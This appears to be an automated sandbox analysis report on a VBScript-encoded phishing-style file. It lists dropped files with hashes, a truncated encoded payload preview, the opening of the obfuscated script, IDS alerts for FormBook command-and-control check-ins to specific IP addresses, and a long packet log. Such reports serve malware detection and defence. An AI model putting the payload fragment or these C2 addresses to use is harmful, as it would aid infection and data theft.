                                          Malicious:false
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:NlllulVmdtZ:NllUM
                                          MD5:013016A37665E1E37F0A3576A8EC8324
                                          SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                          SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                          SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                          Malicious:false
                                          Preview:@...e................................................@..........

                                          C:\Users\user\AppData\Local\Temp\204hG0L

                                          Download File
                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp42bak5.tc3.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdjfcuz2.eey.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkhvrw3x.skq.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdatprk4.wnr.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Roaming\Nationalsocialisternes.Ska

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):482916
                                          Entropy (8bit):5.862637552716462
                                          Encrypted:false
                                          SSDEEP:12288:ub5qPXbRBYx2/5vWvEpBYGUAAEo4y2EgzLNp:ub0bRixc+QBFAP4y2EgzLNp
                                          MD5:06CFF17E73868FBB3A7A3C648C95A7BB
                                          SHA1:92C9DC0411D24BEBCE67E5165109AD359E3D01C3
                                          SHA-256:014AB21D695D7E93CF507C674AF68D27108DDE4BA1230B088B38A961A596DFA7
                                          SHA-512:92191BD8A6C2F7E1B2249F7D4D4B63F4CD99EFB71F97C9BE559800AEA841D6FB87C105E2364230088F2232CCED5286540269FE337C5CEAE4B279CF95AD8F2A9C
                                          Malicious:false
                                          Preview:6wKhOesCA/u7K1kVAHEBm+sCYXEDXCQE6wLEDXEBm7niYtuQ6wKpt3EBm4HBQyM6G+sC3VpxAZuB8SWGFaxxAZvrAmY16wILBOsCncG6nktu2+sCsePrAqLccQGbcQGbMcrrAnN/6wIOBYkUC3EBm+sC6nPR4nEBm3EBm4PBBOsCooBxAZuB+ZWJxAV8zHEBm3EBm4tEJATrAvTNcQGbicPrAmmMcQGbgcOwLjME6wJP+HEBm7qCwykRcQGb6wL954HqhXo1LnEBm+sCIvCB6v1I9OLrAgEI6wKGp+sCJjpxAZtxAZtxAZuLDBBxAZvrAhPdiQwT6wJwv3EBm0JxAZvrAkGogfqUBAUAddZxAZvrAm+uiVwkDOsCvlLrAsNege0AAwAAcQGb6wJFWotUJAjrAhBW6wL/DYt8JATrAu7W6wLnzonrcQGbcQGbgcOcAAAA6wJCWusCWBBT6wL68XEBm2pA6wJfO3EBm4nr6wIBgesCrbrHgwABAAAA8NwFcQGbcQGbgcMAAQAA6wKdy+sCTihT6wL7cXEBm4nr6wKmYXEBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm+sCHFlT6wJcQusCrIxq/3EBm3EBm4PCBXEBm3EBmzH26wK+Z3EBmzHJcQGbcQGbixrrAk576wJGJ0FxAZtxAZs5HAp19HEBm3EBm0ZxAZvrAqQNgHwK+7h133EBm3EBm4tECvxxAZtxAZsp8OsCWcxxAZv/0nEBm3EBm7qUBAUA6wL/5XEBmzHAcQGb6wLJ3Yt8JAxxAZvrAoYKgTQHmmPMW+sCidVxAZuDwATrAowPcQGbOdB15OsCpMvrAl65ifvrAlYNcQGb/9dxAZvrAloacmPMW5o49ZkThkXGrZwzpCHVlwaX4j+3RYZ02nGXtQNh4ic9nQN2ckboUWxlnDMOE4Z1L4k+O2JZ4iVN1oMC2mvXc3E/4g11Hcq+PaOzCx+XY6OXuA9NL5djA9aczU0vl2OD

                                          Static File Info

                                          General

                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.187776309441502
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:Narudzba ACH0036173.vbe
                                          File size:15'503 bytes
                                          MD5:824bafbe5495192cebc5804b329f3094
                                          SHA1:2b0bdbb8bdd2b2a1c85f18830c52c221f83a2948
                                          SHA256:dea03e99875a3cac75ed89dcc01f854f085ff13a9dfb406e25955e36668fde47
                                          SHA512:e66b1f77ad67d14f90656b60bce89b37056eef8d951f53717e615935580615c3eacc5d9b705ce997c1e0642e001363dac7a6a8480e31690698a9d8b424f4ae5d
                                          SSDEEP:192:WuvJOe4C9E+pNiERT050mbxFlWlequJm2KWQa1wgKSNdL+R6ENQDXnpwAm/JdS5j:+K9R7JmXXWlbuznZnENQeJ8QS
                                          TLSH:09627201E90A2BDD2DD7277C0CE0E0386EFA84F2993D5410B5BD4EBD25068879FA4BD8
                                          File Content Preview:..Pistache = Charles......Alungarvningerssc10 = Right("Regimentally",128)....Const Plowjogger = "Frdelslovgivnings telexen,"..Const belight = &HFFFF400D..Const Diaphanoscopy = &HC969..Const Unclaiming = -42283..Const Analyserammen70 = &HFFFF716C..Const Me

                                          File Icon

                                          Icon Hash:68d69b8f86ab9a86

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-05T14:50:25.120627+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737162.159.140.237443TCP
                                          2024-10-05T14:51:15.879361+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44994684.32.84.3280TCP
                                          2024-10-05T14:51:39.172827+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45000884.32.84.3280TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 5, 2024 14:49:46.828361988 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:46.828403950 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:46.828540087 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:46.835455894 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:46.835470915 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.328218937 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.328356981 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.332037926 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.332048893 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.332310915 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.344305038 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.387448072 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.822890997 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823071957 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823132038 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.823163033 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823240042 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823286057 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.823296070 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823430061 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.823479891 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.823487997 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.827729940 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.827790022 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.827817917 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.827902079 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.827948093 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.827956915 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.868451118 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.915179968 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915339947 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915446043 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.915457010 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915491104 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915538073 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.915579081 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915728092 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915777922 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.915801048 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915900946 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.915951014 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.915958881 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916178942 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916224003 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.916233063 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916342974 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916393042 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.916404009 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916886091 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.916934967 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.916944981 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.917058945 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.917112112 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.917121887 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.917208910 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.917273045 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.917280912 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.917984962 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.918035030 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.918042898 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.918126106 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.918169975 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.918178082 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:47.961325884 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:47.961352110 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.007817984 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.007884026 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.007905960 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008008957 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008057117 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008074999 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008176088 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008228064 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008239985 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008305073 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008353949 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008363962 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008398056 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008399963 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008430004 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008447886 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008524895 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.008570910 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.008578062 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.009008884 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.009066105 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.009073973 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.009110928 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.009438992 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.009495974 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.009574890 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.009628057 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.010333061 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.010391951 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.010449886 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.010512114 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.010531902 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.010582924 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.011327982 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.011390924 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.011444092 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.011508942 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.012094975 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.012151957 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.012183905 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.012237072 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.099872112 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.099998951 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100008965 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100042105 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100086927 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100101948 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100141048 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100208998 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100233078 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100311995 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100363016 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100425005 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100455046 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100512981 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100541115 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100605965 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100619078 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100683928 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100724936 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100773096 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.100933075 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.100994110 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101083040 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101144075 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101161003 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101222992 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101356983 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101413012 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101461887 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101514101 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101572037 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101629019 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101670027 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101725101 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101809025 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101866007 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.101897955 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.101952076 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.102113962 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.102166891 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.102195024 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.102252960 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.104809046 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.104872942 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.104899883 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.105005026 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.105021954 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.105072021 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.105112076 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.105159998 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.105235100 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.105284929 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.192424059 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192537069 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.192620993 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192763090 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.192785978 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192817926 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192854881 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192859888 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.192873955 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.192898035 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.192913055 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193057060 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193099976 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193113089 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193135023 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193165064 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193561077 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193599939 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193629026 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193639994 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193660021 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193681955 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.193707943 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.193770885 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.194221020 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194267988 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194315910 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.194315910 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.194331884 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194775105 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194823980 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194847107 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.194860935 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.194881916 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.195377111 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.195440054 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.195446014 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.195476055 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.195507050 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.196018934 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.196073055 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.196088076 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.196103096 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.196131945 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.243494987 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.284945011 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285018921 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285073042 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285098076 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285116911 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285140038 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285177946 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285226107 CEST44349730162.159.140.237192.168.2.4
